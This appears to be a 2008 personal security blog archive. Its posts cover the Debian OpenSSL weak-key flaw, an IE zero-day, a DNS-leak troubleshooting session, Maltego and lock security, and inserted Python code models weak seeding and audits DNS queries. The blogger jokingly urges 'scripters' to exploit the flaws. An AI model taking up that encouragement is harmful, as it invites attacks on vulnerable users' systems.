First we have a crypto nub who decides to remove basically all randomness [the seed used for the PRNG (Pseudo Random Number Generator) used when creating SSL keys] from SSL in Debian. That did not happen last week, nor last month, not even last year, but on Tue May 2 16:34:53 2006 UTC. For reasons that have been mentioned over and over again, non-security people should not, repeat NOT, fiddle with security issues. Especially not packagers who just want things to install cleanly and silently. That bad.

In this case an unnamed individual did not like what he saw as uninitialized data, so he removed one line:
MD_Update(&m,buf,j);
That was enough to give ALL SSL certificates [and thus too the SSH keys that are based on SSL] generated on these systems a randomness that is limited to 32,768 options [all possible PID's on UNIX]... That sounds a lot to humans, to computers that is nothing and to crypto it is fcuk all. It is so small that all possible keys have been generated in about two hours for the 1024-bit DSA and 2048-bit RSA keys for x86. HD Moore used 31 Xeon cores clocked at 2.33GHz to do this.
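Why a seed that varies only with the PID is fatal, and how a defender audits for it, as an added toy model (not OpenSSL's or Debian's code, and not from the original post): SHA-1 over the PID stands in for real key generation, and `toy_key_material`, `distinct_keys`, `build_blacklist` and `audit` are hypothetical names.

```python
import hashlib
import random

PID_SPACE = 32768  # the post's figure: every possible PID


def toy_key_material(pid, pool_bytes, mix_pool):
    """Toy model of the seeding step: hash the PID and, only when mix_pool is
    True, the gathered entropy as well. mix_pool=False models a build in which
    the MD_Update(&m,buf,j) line has been removed."""
    m = hashlib.sha1()
    m.update(pid.to_bytes(2, "big"))
    if mix_pool:
        m.update(pool_bytes)
    return m.digest()


def fingerprint(key_material):
    """Short identifier for a key, used as the blacklist entry."""
    return hashlib.sha256(key_material).hexdigest()[:32]


def distinct_keys(mix_pool, generations, seed=1):
    """Simulate key generation on many hosts and count the distinct results."""
    rng = random.Random(seed)  # fixed seed so the demonstration is repeatable
    seen = set()
    for _ in range(generations):
        pid = rng.randrange(PID_SPACE)
        pool = rng.getrandbits(256).to_bytes(32, "big")  # stand-in for real entropy
        seen.add(toy_key_material(pid, pool, mix_pool))
    return len(seen)


def build_blacklist():
    """Every key the broken generator can ever emit: exactly one per PID."""
    return {
        fingerprint(toy_key_material(pid, b"", False)): pid
        for pid in range(PID_SPACE)
    }


def audit(fingerprints, blacklist):
    """Return the fingerprints that are known-weak and must be regenerated."""
    return [fp for fp in fingerprints if fp in blacklist]


if __name__ == "__main__":
    print("broken build, 50000 generations :", distinct_keys(False, 50000), "distinct keys")
    print("healthy build, 50000 generations:", distinct_keys(True, 50000), "distinct keys")
    blacklist = build_blacklist()
    # Constructed sample: the same PID on a broken and on a healthy host.
    weak = fingerprint(toy_key_material(1234, b"ignored entropy", False))
    good = fingerprint(toy_key_material(1234, b"ignored entropy", True))
    print("keys to regenerate:", audit([weak, good], blacklist))
```

However many keys the broken build generates, the count of distinct keys never exceeds 32,768, which is why a complete blacklist is feasible and why every affected key has to be replaced rather than assessed one by one.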

Luckily for the researchers, HD Moore of Metasploit moved quickly and created the OpenSSL Debian toolset WITHIN 24 HOURS[!!!] to toy with the issue.

Thank you. Scripters of the world: unite and have a ball!

To bring the issues a little closer to your mom & pop [who hardly depend on SSH], Aviv Raff decided to post a real nice and nifty 0-day for IE. Scripters of the world, you know what to do.

This is a particularly nasty one, not just because it affects about 60% of all browsers in the world but also because our friends in Redmond just pushed out their monthly 'updates' so it will take at least another month before a patch is available, let alone the time it takes for mom & pop to actually update their IE.

So life is good, money there is to be made for us security people. Or is it?

Wednesday 14 May 2008

Beta testers wanted for FERRET

Last October David Maynor went to the NASCAR truck series. Of course he brought his iPhone along and was shocked to see so many open WiFi networks:


So what do you do when you made the headlines with your Ferret & Hamster releases in August 2007? You port Ferret [hamster too? Maybe? Please?] to the iPhone.

Now they are looking for beta testers with open iPhones. Feel up to the challenge?

Check here!

Happy Birthday Ha'Aretz!



Never will I forget how we met, how the initial moments were, how deeply I was moved by you and how profound an impact you made on me and my life.

It was a coincidence, no really, it was. It was not as if my life was aimed at that particular event, not that I was brought up to come to you, not that I had any known desire to experience you. It was purely coincidental that we met. Or was it? Was it not so that in my family your name was uttered in soft words of the highest respect? Was it not so that the 'coded' words my grandparents & parents whispered to each other, hidden from us kids, when saying goodbye, were words that ended with something like '...Jerusalem'?

It does not matter. Fact is, that on December the 27th, in the year 1989 you welcomed me. Fact is that ever since that day there is no place on earth that has touched me deeper, felt better, shines brighter than you.

Happy birthday, state of Israel. May you and your inhabitants live, prosper & find the peace and integrity you deserve.

Friday 9 May 2008

Maths is the music of reason




A musician wakes from a terrible nightmare. In his dream he finds himself in a society where music education has been made mandatory. “We are helping our students become more competitive in an increasingly sound-filled world.” Educators, school systems, and the state are put in charge of this vital project. Studies are commissioned, committees are formed, and decisions are made— all without the advice or participation of a single working musician or composer.

Since musicians are known to set down their ideas in the form of sheet music, these curious black dots and lines must constitute the “language of music.” It is imperative that students become fluent in this language if they are to attain any degree of musical competence; indeed, it would be ludicrous to expect a child to sing a song or play an instrument without having a thorough grounding in music notation and theory. Playing and listening to music, let alone composing an original piece, are considered very advanced topics and are generally put off until college, and more often graduate school.

As for the primary and secondary schools, their mission is to train students to use this language— to jiggle symbols around according to a fixed set of rules: “Music class is where we take out our staff paper, our teacher puts some notes on the board, and we copy them or transpose them into a different key. We have to make sure to get the clefs and key signatures right, and our teacher is very picky about making sure we fill in our quarter-notes completely. One time we had a chromatic scale problem and I did it right, but the teacher gave me no credit because I had the stems pointing the wrong way.”

In their wisdom, educators soon realize that even very young children can be given this kind of musical instruction. In fact it is considered quite shameful if one’s third-grader hasn’t completely memorized his circle of fifths. “I’ll have to get my son a music tutor. He simply won’t apply himself to his music homework. He says it’s boring. He just sits there staring out the window, humming tunes to himself and making up silly songs.”

In the higher grades the pressure is really on. After all, the students must be prepared for the standardized tests and college admissions exams. Students must take courses in Scales and Modes, Meter, Harmony, and Counterpoint. “It’s a lot for them to learn, but later in college when they finally get to hear all this stuff, they’ll really appreciate all the work they did in high school.” Of course, not many students actually go on to concentrate in music, so only a few will ever get to hear the sounds that the black dots represent. Nevertheless, it is important that every member of society be able to recognize a modulation or a fugal passage, regardless of the fact that they will never hear one. “To tell you the truth, most students just aren’t very good at music. They are bored in class, their skills are terrible, and their homework is barely legible. Most of them couldn’t care less about how important music is in today’s world; they just want to take the minimum number of music courses and be done with it. I guess there are just music people and non-music people. I had this one kid, though, man was she sensational! Her sheets were impeccable— every note in the right place, perfect calligraphy, sharps, flats, just beautiful. She’s going to make one hell of a musician someday.”


Waking up in a cold sweat, the musician realizes, gratefully, that it was all just a crazy dream. “Of course!” he reassures himself, “No society would ever reduce such a beautiful and meaningful art form to something so mindless and trivial; no culture could be so cruel to its children as to deprive them of such a natural, satisfying means of human expression. How absurd!”

Meanwhile, on the other side of town, a painter has just awakened from a similar nightmare…

***********
And all this leads us into a wonderfully written essay on how we are messing up the love and purity of math for our kids. Written by Paul Lockhart [and NO, that is NOT the space invader Paul Lockhart], an assistant professor at Brown who left to teach a mathematician's point of view to very young children. In his own words, "I want them to understand that there is a playground in their minds and that that is where mathematics happens. So far I have met with tremendous enthusiasm among the parents and kids, less so among the mid-level administrators." Is that so :P

BTW If anybody speaks to Paul, can you please ask him to start blogging or publishing more in any other way shape or form?

An eye opener and good read to boot. Enjoy it!

Thursday 8 May 2008

HELP: Linkedin removed my profile! [well, not mine, really]

What gives? A colleague of mine ran into my office and asked me to check Linkedin to see if I could find his profile. We are connected so, sure, I checked my connections. Since I am known to make a spelling error or two, especially with names, I was not convinced that something was wrong when I did not find him in my connections list.



So I used Google, who loves LinkedIn profiles, to see if I got his name correct: I did.







As a matter of fact, Google nicely cached his profile page on LinkedIn. CCIE # et al. So for sure neither he nor I am nuts, he did have a LinkedIn profile and we are connected. Something must be wrong with my search on LinkedIn, right?

Let's copy & paste that name, and CCIE serial, and repeat the search.


No matter what we tried, all we found was this "Dell sales dude" but never the hardcore network'er that stood behind me, I had linked to, and Google had cached.






So I tried some Google-fu to see if more people had their profile removed by LinkedIn, but all I found was people who asked for themselves to be removed and happy faces that LinkedIn finally lets you remove links to people you once linked to. Silently, to make sure you piss nobody off :P

This is an interesting issue however.

I always check people's LinkedIn profiles when I do job interviews or have business meetings planned with people I do not know. It often helps to make sure you use the correct wording [or metaphors when clueless] when you know a little bit about their [public] background. I know many future employers do the same [Hi guys! I see you browse my profile before you call :D].

But what happens if you can't find that potential new employee on LinkedIn and you know nothing about her|him? Will it influence your initial selection on who to talk to and who not? I am sure it does for lots of companies. Never mind how smart that is, but it is done.

So what do you do when you drop off the most valuable professional showroom of the net? How does one prevent that from happening and having too big an impact on your money making abilities?

Wednesday 7 May 2008

Imagine being Vodafony and bending over Apple...

What do you get after you've been initially big mouthing Steve at the launch of the iPhone, claiming you know it all for you have been in the GSM cloud business so long?

You get the left overs, the 2G countries, like: Australia, the Czech Republic, Egypt, Greece, Italy, India, Portugal, New Zealand, South Africa and Turkey. And those you get not even exclusively, muwaa!!!

Being able to offload 2G handsets into secondary markets will be very useful for Apple if they do launch a 3G version of the iPhone as generally expected.

Now, Arun Sarin has been labeled strange and basically clueless before. Being out of touch with reality really scares the shiit out of people working in his company but who knows, now that he found the way in to Apple's $ stream, maybe the good people working at Vodafone will get a break and develop something nice. Maybe. Then again it is more likely the big shot sees no need for cool iPhone apps and will be happy with the pennies and cents he is allowed to keep for the devices he sells, business as usual.

Tuesday 6 May 2008

opendns resolve issue? no, it's squid.

For reasons only known to my shrink, I wanted Firefox to use a tunnel from a Windows XP machine to an OpenSuse linux host resolving via OpenDNS and squid to make things complete.

Funny stuff, that I do just because I can.

It is all really easy to get it up and running, nice to have your own tools on a sticky and funnel your wild browsing behavior encrypted to a known end point where you set it free into the world wild web. But trust is good, a functional test is better, but checking is better, as my audit teacher taught me. So the first thing I did was monitoring for data leakage on my local [windows host's] interface: nada. Schade.

Then I went to the remote host's interface to see what showed there: horror, nice! What I saw was part of the resolve queries going to my old and reliable [and we all hate reliable, right?] colocate DNS and part of the queries to OpenDNS. Hmm, makes you wonder. So checking the resolve file showed that I had correctly added the two opendns entries, and correctly removed the entries passed to the file via DHCP. I flushed the DNS cache, still no joy. Hmm, makes you wonder. Turned out it was squid not nicely obeying the new entries in the resolver file. Naughty squid!

My setup in more detail:

Firefox [2.0.14 on winXP SP2] well, actually it is FireFoxPortable on a 16Gb Flash Voyager.
putty [version 0.60] for a tunnel to an external host, listening on 127.0.0.1:8888, talking to 127.0.0.1:3128 where squid [Version 2.5.STABLE10] on Suse [2.6.13-15.18 i386]

I have added a boolean option into the URL "about:config" page in Firefox named "network.proxy.socks_remote_dns" and set it to true.

The resolver file on the remote host contains:
cat /etc/resolv.conf
### BEGIN INFO
#
# Modified_by: dhcpcd
# Backup: /etc/resolv.conf.saved.by.dhcpcd.eth0
# Process: dhcpcd
# Process_id: 4326
# Script: /sbin/modify_resolvconf
# Saveto:
# Info: This is a temporary resolv.conf created by service dhcpcd.
# The previous file has been saved and will be restored later.
#
# If you don't like your resolv.conf to be changed, you
# can set MODIFY_{RESOLV,NAMED}_CONF_DYNAMICALLY=no. This
# variables are placed in /etc/sysconfig/network/config.
#
# You can also configure service dhcpcd not to modify it.
#
# If you don't like dhcpcd to change your nameserver
# settings
# then either set DHCLIENT_MODIFY_RESOLV_CONF=no
# in /etc/sysconfig/network/dhcp, or
# set MODIFY_RESOLV_CONF_DYNAMICALLY=no in
# /etc/sysconfig/network/config or (manually) use dhcpcd
# with -R. If you only want to keep your searchlist, set
# DHCLIENT_KEEP_SEARCHLIST=yes in /etc/sysconfig/network/dhcp or
# (manually) use the -K option.
#
### END INFO
nameserver 208.67.222.222
nameserver 208.67.220.220

And yes, I have set both options to 'no'

To clear the dns 'cache' I used:
/etc/init.d/nscd restart

What puzzled me is the following output when I use my local browser [that tunnels its requests to the remote host] and monitor the DNS queries on the remote host's interface [the remote host being my-host.xxx, my provider's dns server being lookup2.colo.xxx]:

tcpdump -p -i eth0 port 53

15:52:19.525862 IP my-host.xxx.33278 > lookup2.colo.xxx.domain: 28225+ A? mokumvonamsterdam.blogspot.com. (48)
15:52:19.526356 IP my-host.xxx.39176 > resolver1.opendns.com.domain: 28417+ PTR? 188.250.202.213.in-addr.arpa. (46)
15:52:19.542138 IP lookup2.colo.xxx.domain > my-host.xxx.33278: 28225 2/7/7[|domain]
15:52:19.739094 IP resolver1.opendns.com.domain > my-host.xxx.39176: 28417 1/0/0 (75)
15:52:19.739459 IP my-host.xxx.39176 > resolver1.opendns.com.domain: 17259+ PTR? 81.240.202.213.in-addr.arpa. (45)
15:52:19.949697 IP resolver1.opendns.com.domain > my-host.xxx.39176: 17259 1/0/0 (67)
15:52:19.950334 IP my-host.xxx.39176 > resolver1.opendns.com.domain: 48705+ PTR? 222.222.67.208.in-addr.arpa. (45)
15:52:19.973525 IP resolver1.opendns.com.domain > my-host.xxx.39176: 48705 1/0/0 (80)
15:52:20.698247 IP my-host.xxx.33278 > lookup2.colo.xxx.domain: 63234+ A? www.blogger.com. (33)
15:52:21.028751 IP lookup2.colo.xxx.domain > my-host.xxx.33278: 63234 2/7/7[|domain]
15:52:23.133656 IP my-host.xxx.33278 > lookup2.colo.xxx.domain: 57393+ A? www.youtube.com. (33)
15:52:23.134089 IP lookup2.colo.xxx.domain > my-host.xxx.33278: 57393 3/3/3 A youtube.com,[|domain]
15:52:23.134563 IP my-host.xxx.39176 > resolver1.opendns.com.domain: 51875+ PTR? 253.153.65.208.in-addr.arpa. (45)
15:52:23.157911 IP resolver1.opendns.com.domain > my-host.xxx.39176: 51875 1/0/0 (70)
15:52:24.315674 IP my-host.xxx.33278 > lookup2.colo.xxx.domain: 48709+ A? twitter.com. (29)
15:52:24.502987 IP lookup2.colo.xxx.domain > my-host.xxx.33278: 48709 1/5/5 A[|domain]
15:52:25.981131 IP my-host.xxx.33278 > lookup2.colo.xxx.domain: 25981+ A? www.google.com. (32)
15:52:25.981560 IP lookup2.colo.xxx.domain > my-host.xxx.33278: 25981 5/7/7 CNAME www.l.google.com.,[|domain]
15:52:28.057148 IP my-host.xxx.33278 > lookup2.colo.xxx.domain: 20445+ A? www.google-analytics.com. (42)
15:52:28.057758 IP lookup2.colo.xxx.domain > my-host.xxx.33278: 20445 5/7/7 CNAME[|domain]
15:52:29.280144 IP my-host.xxx.33278 > lookup2.colo.xxx.domain: 59181+ A? toolbarqueries.google.com. (43)
15:52:29.408904 IP lookup2.colo.xxx.domain > my-host.xxx.33278: 59181 5/7/7[|domain]

Turned out that I had to restart squid [/etc/init.d/squid restart] to make the resolving act nicely and forward _all_ lookups to opendns.com

16:12:04.543848 IP my-host.xxx.39176 > resolver1.opendns.com.domain: 8407+ A? mokumvonamsterdam.blogspot.com. (48)
16:12:04.567414 IP resolver1.opendns.com.domain > my-host.xxx.39176: 8407 2/0/0[|domain]
16:12:05.282740 IP my-host.xxx.39176 > resolver1.opendns.com.domain: 58294+ A? www.blogger.com. (33)
16:12:05.306651 IP resolver1.opendns.com.domain > my-host.xxx.39176: 58294 2/0/0 CNAME[|domain]
16:12:08.624282 IP my-host.xxx.39176 > resolver1.opendns.com.domain: 59333+ A? central.ujcfedweb.org. (39)
16:12:08.843032 IP resolver1.opendns.com.domain > my-host.xxx.39176: 59333 2/0/0 CNAME[|domain]
16:12:10.189203 IP my-host.xxx.39176 > resolver1.opendns.com.domain: 58807+ A? twitter.com. (29)
16:12:10.212537 IP resolver1.opendns.com.domain > my-host.xxx.39176: 58807 1/0/0 A 128.121.146.100 (45)
16:12:10.213033 IP my-host.xxx.39177 > resolver1.opendns.com.domain: 18146+ PTR? 100.146.121.128.in-addr.arpa. (46)
16:12:10.236480 IP resolver1.opendns.com.domain > my-host.xxx.39177: 18146 NXDomain 0/0/0 (46)
16:12:12.703541 IP my-host.xxx.39176 > resolver1.opendns.com.domain: 11197+ A? www.google.com. (32)
16:12:12.727000 IP resolver1.opendns.com.domain > my-host.xxx.39176: 11197 3/0/0 CNAME[|domain]
16:12:13.629888 IP my-host.xxx.39176 > resolver1.opendns.com.domain: 24465+ A? www.justsayhi.com. (35)
16:12:13.738147 IP resolver1.opendns.com.domain > my-host.xxx.39176: 24465 1/0/0 A 4.78.241.72 (51)
16:12:13.738702 IP my-host.xxx.39177 > resolver1.opendns.com.domain: 42572+ PTR? 72.241.78.4.in-addr.arpa. (42)
16:12:14.273047 IP resolver1.opendns.com.domain > my-host.xxx.39177: 42572 NXDomain 1/0/0 CNAME[|domain]
16:12:15.706642 IP my-host.xxx.39176 > resolver1.opendns.com.domain: 54172+ A? www.google-analytics.com. (42)
16:12:15.730274 IP resolver1.opendns.com.domain > my-host.xxx.39176: 54172 5/0/0 CNAME[|domain]
16:12:18.673145 IP my-host.xxx.39176 > resolver1.opendns.com.domain: 40629+ A? toolbarqueries.google.com. (43)
16:12:18.696662 IP resolver1.opendns.com.domain > my-host.xxx.39176: 40629 5/0/0[|domain]


Hope this helps someone trying to use opendns.com too.
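A capture like the ones above can be checked mechanically for queries that leave for a resolver other than the configured ones. An added example, not part of the original post: the sample lines are copied from the two captures above, and `EXPECTED`, `queries`, `queries_by_resolver` and `find_leaks` are hypothetical names.

```python
import re
from collections import Counter, defaultdict

# Lines copied from the capture taken before squid was restarted.
BEFORE_RESTART = """\
15:52:19.525862 IP my-host.xxx.33278 > lookup2.colo.xxx.domain: 28225+ A? mokumvonamsterdam.blogspot.com. (48)
15:52:19.526356 IP my-host.xxx.39176 > resolver1.opendns.com.domain: 28417+ PTR? 188.250.202.213.in-addr.arpa. (46)
15:52:19.542138 IP lookup2.colo.xxx.domain > my-host.xxx.33278: 28225 2/7/7[|domain]
15:52:19.739094 IP resolver1.opendns.com.domain > my-host.xxx.39176: 28417 1/0/0 (75)
15:52:19.739459 IP my-host.xxx.39176 > resolver1.opendns.com.domain: 17259+ PTR? 81.240.202.213.in-addr.arpa. (45)
15:52:19.949697 IP resolver1.opendns.com.domain > my-host.xxx.39176: 17259 1/0/0 (67)
15:52:19.950334 IP my-host.xxx.39176 > resolver1.opendns.com.domain: 48705+ PTR? 222.222.67.208.in-addr.arpa. (45)
15:52:19.973525 IP resolver1.opendns.com.domain > my-host.xxx.39176: 48705 1/0/0 (80)
15:52:20.698247 IP my-host.xxx.33278 > lookup2.colo.xxx.domain: 63234+ A? www.blogger.com. (33)
15:52:21.028751 IP lookup2.colo.xxx.domain > my-host.xxx.33278: 63234 2/7/7[|domain]
15:52:23.133656 IP my-host.xxx.33278 > lookup2.colo.xxx.domain: 57393+ A? www.youtube.com. (33)
15:52:23.134089 IP lookup2.colo.xxx.domain > my-host.xxx.33278: 57393 3/3/3 A youtube.com,[|domain]
"""

# Lines copied from the capture taken after the restart.
AFTER_RESTART = """\
16:12:04.543848 IP my-host.xxx.39176 > resolver1.opendns.com.domain: 8407+ A? mokumvonamsterdam.blogspot.com. (48)
16:12:04.567414 IP resolver1.opendns.com.domain > my-host.xxx.39176: 8407 2/0/0[|domain]
16:12:05.282740 IP my-host.xxx.39176 > resolver1.opendns.com.domain: 58294+ A? www.blogger.com. (33)
16:12:05.306651 IP resolver1.opendns.com.domain > my-host.xxx.39176: 58294 2/0/0 CNAME[|domain]
16:12:08.624282 IP my-host.xxx.39176 > resolver1.opendns.com.domain: 59333+ A? central.ujcfedweb.org. (39)
16:12:08.843032 IP resolver1.opendns.com.domain > my-host.xxx.39176: 59333 2/0/0 CNAME[|domain]
16:12:10.189203 IP my-host.xxx.39176 > resolver1.opendns.com.domain: 58807+ A? twitter.com. (29)
16:12:10.212537 IP resolver1.opendns.com.domain > my-host.xxx.39176: 58807 1/0/0 A 128.121.146.100 (45)
16:12:10.213033 IP my-host.xxx.39177 > resolver1.opendns.com.domain: 18146+ PTR? 100.146.121.128.in-addr.arpa. (46)
16:12:10.236480 IP resolver1.opendns.com.domain > my-host.xxx.39177: 18146 NXDomain 0/0/0 (46)
"""

# Resolvers from the post's resolv.conf and capture. resolver2.opendns.com is
# an assumed name for the second address; it does not appear on the page.
EXPECTED = {"208.67.222.222", "208.67.220.220",
            "resolver1.opendns.com", "resolver2.opendns.com"}

# Outgoing query: "<time> IP <src>.<port> > <resolver>.domain: <id>+ <TYPE>? <name>"
# (".53" instead of ".domain" when tcpdump runs with -n).
QUERY_RE = re.compile(
    r"^(?P<time>\d\d:\d\d:\d\d\.\d+) IP (?P<src>\S+)\.(?P<sport>\d+) > "
    r"(?P<resolver>\S+)\.(?:domain|53): (?P<id>\d+)\S* (?:\[[^\]]*\] )?"
    r"(?P<qtype>[A-Z0-9]+)\? (?P<name>\S+)"
)


def queries(capture):
    """Yield (source_port, resolver, qtype, name) for each outgoing DNS query.
    Responses have no numeric source port before '>' and are skipped."""
    for line in capture.splitlines():
        m = QUERY_RE.match(line)
        if m:
            yield int(m["sport"]), m["resolver"], m["qtype"], m["name"]


def queries_by_resolver(capture):
    """Number of queries sent to each resolver."""
    return dict(Counter(resolver for _, resolver, _, _ in queries(capture)))


def find_leaks(capture, expected=EXPECTED):
    """Group queries sent to unexpected resolvers by (resolver, source port).
    One source port is one socket, so a long-running process that still uses
    the old resolver shows up as a single key."""
    leaks = defaultdict(Counter)
    for sport, resolver, qtype, _ in queries(capture):
        if resolver not in expected:
            leaks[(resolver, sport)][qtype] += 1
    return {key: dict(counts) for key, counts in leaks.items()}


if __name__ == "__main__":
    for label, capture in (("before", BEFORE_RESTART), ("after", AFTER_RESTART)):
        print(label, queries_by_resolver(capture), "leaks:", find_leaks(capture))
```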

Friday 2 May 2008

Google ad's my Inbox(1) !!!


Here is a nice variation on misleading Google ads: claiming your Inbox has (1) unread email, smart move [thanks to Twitter, Twinkle & Jeroen Mirck for making this possible :P ].


I liked the people who used the ASCII ads last year, I do, I am in the market for funny ads that make me wonder, think or just laugh.
Unfortunately, ASCII art ads are over since Google altered the 'punctuation' rule.

Thursday 1 May 2008

Maltego v2 - is ready!


Oh boy I am so excited!

Get it at: http://www.paterva.com/maltego/

All,

After 15 months of work Maltego version 2.0 is ready. It's been a long and interesting road. Many of you have seen the product grow from beta 1 to beta 2, then KZ3 and JS1. I've shared with you the challenges, the ups and downs. Finally, today, I am happy to release version 2.0.
Version 2.0 is commercial and I feel it's got the right to be commercial because it's by far the coolest and most useful application I've ever used (OK so perhaps I am just slightly biased). As I've mentioned before - it goes live to this list first. Everything is set up, but not linked to the main site. I will link it on Monday.

Also - as promised - a list of new features/improvements:

* Load/Save of entire graphs means you can always go back to your investigation.
* Printing of graphs (over multiple pages)
* Export of entities (CSV format) makes it easy to import Maltego data into other databases.
* Commercial grade layout library:
  o The layout and navigation have been optimized for speed and usability.
  o Four layout types to rearrange data the way YOU want it.
  o Two view types for finding relevant info on large graphs.
* More entities and 20 brand new transforms for even deeper searches and more information.
* Search/Find (on entity value, detailed info and additional fields) helps you to get to key nodes quicker.
* Multiple open graphs on different tabs for easy switching between graphs.
* Dedicated clear-all, zoom buttons for notebook users.
* Hollywood quality look & feel will impress your friends and your boss.
* Integrated help on transforms and entities to increase your learning curve.
* Complete user guide ensures you are never lost.
* Prepopulated and preconfigured transforms and transform sets saves you time.
* Population of API key integrated with license key so it’s never lost.
* Platform independent installer means you can install it anywhere.

If you want to see what it looks like before making a commitment you should look at the user guide and the screen shots. You should also read the system requirements.

The documentation can be found at http://ctas.paterva.com/wiki

Enjoy responsibly,
Roelof.

Wednesday 30 April 2008

Avoiding speed traps, different

57 year old dude tries to avoid a speedtrap by applying the front brake and sliding past below the radar:



Did not really work well. Broke his arm _and_ got a ticket.

Saturday 26 April 2008

Locks, SKG, the challenge

Whenever I move in to a new apartment, a new office building or take on the responsibility of other property that is secured by a cylinder lock, I exchange it.

The old cylinder and all its associated keys will be documented and stored for later retrieval.

The new cylinder will be bought by me, at a store I trust and with a security certificate I like, and I pay attention that _nothing_ that can identify me or my location gets associated with the certificate, for I would not like to have to worry about the whereabouts of that data since it is not under my control [the certificate can be used to remake a key without having a copy of the key].

So I pay by cash and have a second locksmith do the installation.

The apartment I moved in to recently is a newly built complex. About 1,000 apartments have been built by 45 different subcontractors who dig holes, lay pipes, pull wires, connect walls, paint doors and insert locks. For whatever it is worth: I do not trust them. The chance that one of the workers copies the cuts of my particular key is just something that makes me feel uncomfortable.

Personally I know too little about the inner workings of locks to be able to make a valid judgement about the grade of the lock, so I will buy only stuff that does comply with the toughest international standards, including ISO 9001/2000, UL, CEN, VDS, SKG, CPC and A2P. Or when in Holland, the SKG [Stichting Kwaliteit Gevelbouw].

It is amazing to see that the price difference between a SKG ** and *** is rather low in comparison to the added features. One of the features I find a must have is the bump key proofing of locks. But all of this is just to prevent the damage free opening of the door.

Other measures need to be taken to prevent the more common 'crowbar style' and the 'Bulgarian' method [drilling]. A good resource of more information on the topic is The Open Organisation Of Lockpickers that is credited with spreading the word on the issue in Holland, but even more important the concept behind high security lock design by Ross Kinard.

Friday 25 April 2008

Googlology!

Never mind those old and dusty religions, forget the olt skool printed stuff, do not bother with the 10 rules, forget about diet stuff, reincarnation is of the past, after life is obsolete.

What rules now is Googlology. It's religion on steroids. No need for G*d in heaven, no need for spirits in the sky. Googlology designs and runs its own heaven, and its name is 'The Cloud'

The cloud will take care of your data, no matter where you need it, it will be there. The cloud will provide your services with more computing power than it needs, and then some. The cloud will harbour your applications, your email, your videostream, your rants, your pictures, your secrets and your dates, your world, your drawings, your finances, your money, and a whole lot more.

And I should know, since I drink all the Google Gulp from a hose.

But what if the cloud, errr, sort of not does what the EULA sort of makes you believe? What if the lawyer@TheCloud p0wnzers you? And your data? What if, insert-your-personally-favorite-upper-being-here, strikes back and lets some unknown entity take control over, well, you, basically?

How does one secure the absolute power of the cloud? There are some very smart people talking about it but lots of discussion is still about the definition, much less about the consequences, let alone what it actually means or how to do it.

Do you want to be the one who turns off the light now that everybody has left the old arena, or will you participate in shaping the future?

Tuesday 22 April 2008

Replace your MAC harddisk, easy


I should do stuff more often, at least it makes far hotter stuff come out.

Couple of days ago I decided that both MAC laptops in the house needed more storage. The G4 PowerBook and the MacBook. So I ordered a Western Digital Scorpio 250GB 5400RPM and a Western Digital Scorpio 320GB 5400RPM. The replacement of the MacBook one can do with a sharp kitchen knife, no problem. Just remove the battery [do not bother shutting the OS down, it's as stable as my weight] and take a sharp kitchen knife [I used the new Global one I gave my wife a couple of days ago]. Unscrew 3 little screws, pull out the harddisk, take a strong plier, remove the 4 screws, take the plastic thingy, wrap it on the new disk, sort of re attach the 4 screws, stick the thing back in. Ram the old battery in and off you go [never mind about the 3 little screws and the metal strip, all just surplus weight].

Reinstall and do not mind about the updates that want you to reboot your DVD version of the OS 4 times!

Now the Powerbook, that is another story. About 23 Phillips screws [tiny fuckers!] and then 2 torx 6, that is SIX, not 8, but 6, the smallest possible tool made only in Switzerland and it will set you back about the same amount of euros as the 320Gb disk.

Then you get to pull off two, well, 'connectors' that are actually used open ended flatcables: class construction. Putting the whole thing back is a joy. Takes the precision of a live-bomb-defuser, nice engineering.

Installing the OS of course requires the PPC version. Inserting the iMac Intel version yields a nice panic message. Never mind about the I-do-not-know-how-many updates and reboots [even for the so called 3.1.x SAFARI update one gets a reboot!], for they slow down the secure OS X anyway.

Right after finishing something flashy caught my eye: the MHZ2 CJ.

A 2.5 inch Serial-ATA Revision 2.6 (Gen1i and Gen2i) hard disk with embedded AES 256-bit hardware-based encryption, high-speed rotational speed of 7200rpm, it supports SATA 3.0Gbit/s and the capacities go up to 320GB with a 16MB buffer... How is that for cool?

You know what that means as soon as you see it: dumping the current disk for no reason on ebay, including all the private data it has accumulated in a month's time and overpay for the new disk since it is new and hot.

vrijdag 18 april 2008

Searching & Finding, part II

So there is Maltego, the coolest tool for finding information, and there are machines that find lots of data. Of course Google uses some very smart algorithms, and Udi Manber really knows what he's talking about. On April 16, 2008 he answered the question "When I come to a Google in the future the context of my social network could be folded into the search?" with "I can imagine if you give us permission to do that, and we find that that’s useful for some queries. The question is, what percentage of queries and what kind of queries? When should you use it and when should you not use it?"

This had me completely baffled. WHAT? I was saying to myself WHAT IS WRONG WITH THIS DUDE? I mean, after one look at the concept of Maltego I knew that that is the only way forward. Maybe he drank a little too much Google Gulp? Maybe he was trying to hide something, since Google does not do pre-announcements? Or maybe he'd seen Maltego or Delver too and was just trying to suppress their market value so the goog's could snatch it up for little money in little time?

"We have no intention of competing with the Googles of the world, because Google is doing a very good job of indexing the Web and bringing you the Wikipedia page of every search query you're looking for," says Liad Agmon, CEO of Delver. But we've been there, seen it, and even do it ourselves now.

But that does not satisfy anymore. You know the procedure yourself: go to google.com, type a couple of keywords, check the first listing, alter the keywords [order even], check the listing and on and on. Most of the listings you get will be actively manipulated by crooks and link spammers.

So we need something else. As Anand Rajaraman puts it: if you have limited resources, add more data rather than fine-tuning the weights on your fancy machine-learning algorithm. Of course, you have to be judicious in your choice of the data to add to your data set. And this is exactly the point I am trying to drive home. More data sources [and some very decent post processing] enhance the results in amazing ways. [He works on his own SE too, called kosmix.]

Some say it is a terrible idea, like KublaiKhan. "This sort of searching will result in information from 'opposing sides' of controversies or arguments being deprecated, resulting in skewed information being available--because people tend to associate themselves with other people of the same opinion." He goes on: "This new search engine will be wildly popular amongst the type of person who enjoys violent flamewars, and will be useless for any person who wishes to consider both sides of a situation before forming an opinion... so it's going to be an enormous success and if I had the cash I'd invest in it. :-/"

Personally I would like to quote merreborn in reply to that remark:
"Sorry, I can't friend you, you'll screw up my search results"

Update:
Seems there is much, much more going on and wrong between Google and social websites...

Friday, 11 April 2008

Everything you ever wanted to know about the Enigma


As great a machine the Enigma was, it too could not prevent users from messing it up. Examples:

